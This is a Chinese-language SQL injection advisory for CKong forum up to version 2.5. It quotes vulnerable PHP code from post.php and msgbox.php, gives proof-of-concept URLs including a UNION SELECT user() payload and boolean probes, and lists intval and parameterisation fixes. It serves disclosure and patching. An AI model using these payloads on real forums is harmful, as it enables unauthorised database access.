程序:心空论坛(CKong) 版本:<=2.5 类型:sql注射 漏洞分析 1、post.php <? require_once("include/config.inc.php"); require_once('include/functions.inc.php'); $fid=intval($fid); $tid=intval($tid); $pid=intval($pid); ......... if(!$C_errormsg) { if($postid) { $sql='select post_content,post_date,user_name from '.__TAB_POST__.' where post_id='.$postid; $result=$db->sql_query($sql); $rows=$db->sql_fetchrow($result); $qcontent=preg_replace("/\[quote\](.*)\[\/quote\]/is","",$rows['post_content']); $qtime=date("Y-n-j G:i",$rows['post_date']); $articlecontent=' 引用'.$rows['user_name'].'于'.$qtime."发表的文章: \n".$qcontent." \n"; } ....... |
变量$postid过滤不严导致sql注射攻击,测试如下: http://www.xxxx.cn/bbs/post.php?tid=988&postid=6157%20and%201=2%20union%20select%20user(),2,1 |
2、msgbox.php <? ......... }elseif($action=='read') { $sql="select msg_id from ".__TAB_MSG__." where user_name='".$_SESSION['username']."' and msg_id>$msgid and msg_kind='$kind' order by msg_id limit 1"; $result=$db->sql_query($sql); $rows=$db->sql_fetchrow($result); $nextmsgid=$rows['msg_id']; .......... |
变量$msgid 过滤不严导致sql注射攻击,测试如下: http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=1 http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=2 |
漏洞修补 1、post.php 中在使用 $postid 之前加入 $postid=intval($postid);(与同文件开头对 $fid、$tid、$pid 的处理保持一致); 2、msgbox.php 中在使用 $msgid 之前加入 $msgid=intval($msgid);。intval 会把变量强制转换为整数,拼入 SQL 的只能是一个数字,注入片段无法到达查询。另外,msgbox.php 的 SQL 中 $kind 也是直接拼接到单引号字符串里的,若该值同样来自请求,也应当转义或改用参数化查询。 |
|